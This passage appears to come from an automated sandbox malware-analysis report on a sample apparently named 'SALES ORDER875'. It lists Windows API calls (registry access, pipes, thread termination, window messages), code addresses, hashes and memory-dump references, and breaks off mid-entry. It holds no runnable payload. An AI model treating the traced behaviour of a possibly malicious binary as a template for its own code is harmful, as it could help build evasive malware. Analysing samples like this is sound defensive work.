                                                                                                                                                                                    • Opcode Fuzzy Hash: b9bcfb9ad08ed037d782ae787411294510186b99b1419cb864bccbf2a20eb298
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6041667194526C5FDF13EFA5CD81ADEB7B9AF08380F1001E6E505EB181EB35AA85CB50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00412E1C
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00412E4F
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00412E84
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00412EB6
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00412EE0
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00412EF1
                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00412F0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                                                    • Opcode ID: a70495741a3700e7ed4af8df58b5ea970258345bb380ec88c88ccd663b9148d4
                                                                                                                                                                                    • Instruction ID: 42a533ec9a49ece1dc9504f44cc1a175849ccbe051d6904399356a2468c85e1a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a70495741a3700e7ed4af8df58b5ea970258345bb380ec88c88ccd663b9148d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D311570644250AFDB20CF18DD84FAA37E1EB4A711F144166F914CB2B2CBB5ECA0DB09
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E7769
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E778F
                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 003E7792
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 003E77B0
                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 003E77B9
                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 003E77DE
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 003E77EC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                    • Opcode ID: 75541f29b464d1091f7d073aba016bd4eeebdf15755c2af807bd0bef026454ba
                                                                                                                                                                                    • Instruction ID: aa9854fcfa9ca924c84e21a103de04990dc6d3bd26af59e095a0eedb61608923
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75541f29b464d1091f7d073aba016bd4eeebdf15755c2af807bd0bef026454ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C21D376608229AFDF11EFA9CC88CFB73ACEB093647048135FA14DB190D670DC428B64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E7842
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003E7868
                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 003E786B
                                                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 003E788C
                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 003E7895
                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 003E78AF
                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 003E78BD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                    • Opcode ID: eb4c79f89574bc6976ed4cd42da99a56cda8448bb1100a504b785afda57695d7
                                                                                                                                                                                    • Instruction ID: c7e194f15f78611b560049d2ab5f6539d84cbb58b451ddf603bdcbf3a560f6f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb4c79f89574bc6976ed4cd42da99a56cda8448bb1100a504b785afda57695d7
                                                                                                                                                                                    • Instruction Fuzzy Hash: F021A175608224AFDF11AFA9DC8DDAA77ECEB193607108225F915CB2A1D670DC41CB68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 003F04F2
                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F052E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                    • Opcode ID: 1fda2568ff0657c5bc51aabb7cedc941a922b366dbfe6ffbbc926361ccde1a8d
                                                                                                                                                                                    • Instruction ID: 675ea38110288747a15e7acf5e35286ebbfe0c470ab75e89ceff9a22f146ce34
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fda2568ff0657c5bc51aabb7cedc941a922b366dbfe6ffbbc926361ccde1a8d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1621A074504309ABDF258F2CDC44AAA77A4AF46724F204A29FAA5E72E1D7B0D940CF20
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 003F05C6
                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F0601
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                    • Opcode ID: eee5e45849abe63f0a8881328d1f28d40fd62cba79cd75b2d9bf038c7b12e702
                                                                                                                                                                                    • Instruction ID: 076ac9a2129a3fa1b83291a7e3e00bd56716135c5d33fee780025facd81f1812
                                                                                                                                                                                    • Opcode Fuzzy Hash: eee5e45849abe63f0a8881328d1f28d40fd62cba79cd75b2d9bf038c7b12e702
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F21B5755003199BDB258F6CCC44AAA77E8FF85720F204A19FEA1E72D1D7B09860CB14
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0038600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0038604C
                                                                                                                                                                                      • Part of subcall function 0038600E: GetStockObject.GDI32(00000011), ref: 00386060
                                                                                                                                                                                      • Part of subcall function 0038600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0038606A
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00414112
                                                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0041411F
                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0041412A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00414139
                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00414145
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                                                    • Opcode ID: 1db86346d210a40799802baa3879bb9c0379b1dd512d83fcc4c8fba6369e7fb8
                                                                                                                                                                                    • Instruction ID: 81a9e8b46422a9d6247591c04a4f5e3fc0e45d3c9269433201a4d786db054edc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1db86346d210a40799802baa3879bb9c0379b1dd512d83fcc4c8fba6369e7fb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11B2B2140219BEEF119F64CC86EE77F5DEF09798F104111BA18A6150C776DC61DBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003BD7A3: _free.LIBCMT ref: 003BD7CC
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD82D
                                                                                                                                                                                      • Part of subcall function 003B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000), ref: 003B29DE
                                                                                                                                                                                      • Part of subcall function 003B29C8: GetLastError.KERNEL32(00000000,?,003BD7D1,00000000,00000000,00000000,00000000,?,003BD7F8,00000000,00000007,00000000,?,003BDBF5,00000000,00000000), ref: 003B29F0
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD838
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD843
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD897
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD8A2
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD8AD
                                                                                                                                                                                    • _free.LIBCMT ref: 003BD8B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                                                                    • Instruction ID: d2177d732179a1f5a7d14c7c79ae8d40dc197b10f1acdf26c106a882b3dd55c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                                                                    • Instruction Fuzzy Hash: A011F971540B04BAD622BFB0CC47FCB7BDCAF05704F404D25B39DAA892EB76A5158660
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003EDA74
                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 003EDA7B
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003EDA91
                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 003EDA98
                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003EDADC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 003EDAB9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                                                                                    • Opcode ID: 4fdbc191bba525edd4ae45e0e8449d3c6ff560640fcb8ca620a1b3b14a975b81
                                                                                                                                                                                    • Instruction ID: c8a7df8b2d151d161d96b1f054dd97e4722a5390015c2728855cd409c2bfea20
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fdbc191bba525edd4ae45e0e8449d3c6ff560640fcb8ca620a1b3b14a975b81
                                                                                                                                                                                    • Instruction Fuzzy Hash: E20186F69402187FE7119BA49DC9FE7336CE708301F4045A2B706E6081E6749E844F78
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InterlockedExchange.KERNEL32(016CD970,016CD970), ref: 003F097B
                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(016CD950,00000000), ref: 003F098D
                                                                                                                                                                                    • TerminateThread.KERNEL32(56495244,000001F6), ref: 003F099B
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(56495244,000003E8), ref: 003F09A9
                                                                                                                                                                                    • CloseHandle.KERNEL32(56495244), ref: 003F09B8
                                                                                                                                                                                    • InterlockedExchange.KERNEL32(016CD970,000001F6), ref: 003F09C8
                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(016CD950), ref: 003F09CF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                                                    • Opcode ID: baab4d5d19647f457fb9212db2403e159faa58baa35d70497293f353cdaabd7e
                                                                                                                                                                                    • Instruction ID: 0e415d3833dbc10e0b46043680a30e5b74ef2108e84daf039df47e6f2199823d
                                                                                                                                                                                    • Opcode Fuzzy Hash: baab4d5d19647f457fb9212db2403e159faa58baa35d70497293f353cdaabd7e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05F01932882A12BBD7565BA4EEC8AE6BA39BF01702F406025F202908A1D7B49465CF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __allrem.LIBCMT ref: 003B00BA
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B00D6
                                                                                                                                                                                    • __allrem.LIBCMT ref: 003B00ED
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B010B
                                                                                                                                                                                    • __allrem.LIBCMT ref: 003B0122
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003B0140
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                    • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                                                                                    • Instruction ID: 07562818f2a8ee2f14f641e588ef40cbe1fd4fe034700e749331af60e7c32c94
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59810A756007059FE72AAE68CC41BABB3E8DF42768F15463DF651DBA81EB70DD008750
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003A82D9,003A82D9,?,?,?,003B644F,00000001,00000001,8BE85006), ref: 003B6258
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003B644F,00000001,00000001,8BE85006,?,?,?), ref: 003B62DE
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003B63D8
                                                                                                                                                                                    • __freea.LIBCMT ref: 003B63E5
                                                                                                                                                                                      • Part of subcall function 003B3820: RtlAllocateHeap.NTDLL(00000000,?,00451444,?,0039FDF5,?,?,0038A976,00000010,00451440,003813FC,?,003813C6,?,00381129), ref: 003B3852
                                                                                                                                                                                    • __freea.LIBCMT ref: 003B63EE
                                                                                                                                                                                    • __freea.LIBCMT ref: 003B6413
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                    • Opcode ID: 841f0b7692796499bd64b3be5e9752587da170e0917899218de3755b3f09bdff
                                                                                                                                                                                    • Instruction ID: 87490f5e1a711fe4843e4f93b10e4b801f5d631c750cbf7d9a1e29641edc854a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 841f0b7692796499bd64b3be5e9752587da170e0917899218de3755b3f09bdff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8251F772A00216ABEB274F64CC82EEF77A9EB44718F154629FE09DA552DB38DC44C660
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                      • Part of subcall function 0040C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040B6AE,?,?), ref: 0040C9B5
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040C9F1
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040CA68
                                                                                                                                                                                      • Part of subcall function 0040C998: _wcslen.LIBCMT ref: 0040CA9E
                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040BCCA
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040BD25
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040BD6A
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0040BD99
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040BDF3
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040BDFF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1120388591-0
                                                                                                                                                                                    • Opcode ID: 31c0fb990bab7c650e6b660b70863f1eacd040b0db887175d058d74a7aea5611
                                                                                                                                                                                    • Instruction ID: f0c59f4929f8f73ff99453551f89d030d363759d11526a9fe79ad579abb74d7d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c0fb990bab7c650e6b660b70863f1eacd040b0db887175d058d74a7aea5611
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF819F30108341AFD715EF24C881E6ABBE5FF84308F1485AEF4555B2A2DB35ED45CB96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 003DF7B9
                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 003DF860
                                                                                                                                                                                    • VariantCopy.OLEAUT32(003DFA64,00000000), ref: 003DF889
                                                                                                                                                                                    • VariantClear.OLEAUT32(003DFA64), ref: 003DF8AD
